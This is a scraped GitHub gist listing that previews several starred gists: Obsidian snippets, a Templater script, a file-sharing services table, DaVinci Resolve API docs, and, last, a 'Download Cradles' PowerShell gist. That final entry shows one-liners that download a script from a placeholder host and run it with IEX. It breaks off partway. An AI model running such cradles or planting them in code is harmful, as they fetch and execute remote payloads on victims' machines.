Skip to content

Instantly share code, notes, and snippets.

View cybersader's full-sized avatar
💭
Working in cyberspace

cybersader

💭
Working in cyberspace
View GitHub Profile
@Mearman
Mearman / Obsidian Snippets
Last active October 17, 2025 02:48
Obsidian Snippets
A collection of snippets
@GitMurf
GitMurf / obsidian.templater.move-line.js
Last active March 22, 2025 17:26
Move the active line of the active file to a chosen file.
<%*
//v1.6.2: Fix with update to Templater where wasn't removing the selected text/line "on move"
//'first' will add to top of file. 'last' will add to bottom of file
let firstOrLastLine = 'last';
//Choose a specific line to move to underneath; overrules firstOrLastLine if true
const bChooseLine = false;
//After moving the line, open the file it was moved to
@Bad3r
Bad3r / Private_File_Sharing_Services.md
Last active October 14, 2025 10:10
Private File Sharing Services

Centralized File Sharing


Site Size Limit API Clearnet Mirrors Tor Mirrors Online
GoFile.io No Limit API N/A
@X-Raym
X-Raym / DaVinci Resolve Scripting Doc.txt
Last active December 1, 2025 18:57
DaVinci Resolve Scripting API Doc v20.3
Last Updated: 7 Oct 2025
-------------------------
In this package, you will find a brief introduction to the Scripting API for DaVinci Resolve Studio. Apart from this README.txt file, this package contains folders containing the basic import
modules for scripting access (DaVinciResolve.py) and some representative examples.
From v16.2.0 onwards, the nodeIndex parameters accepted by SetLUT() and SetCDL() are 1-based instead of 0-based, i.e. 1 <= nodeIndex <= total number of nodes.
Overview
--------
As with Blackmagic Fusion scripts, user scripts written in Lua and Python programming languages are supported. By default, scripts can be invoked from the Console window in the Fusion page,
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active December 1, 2025 12:37
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object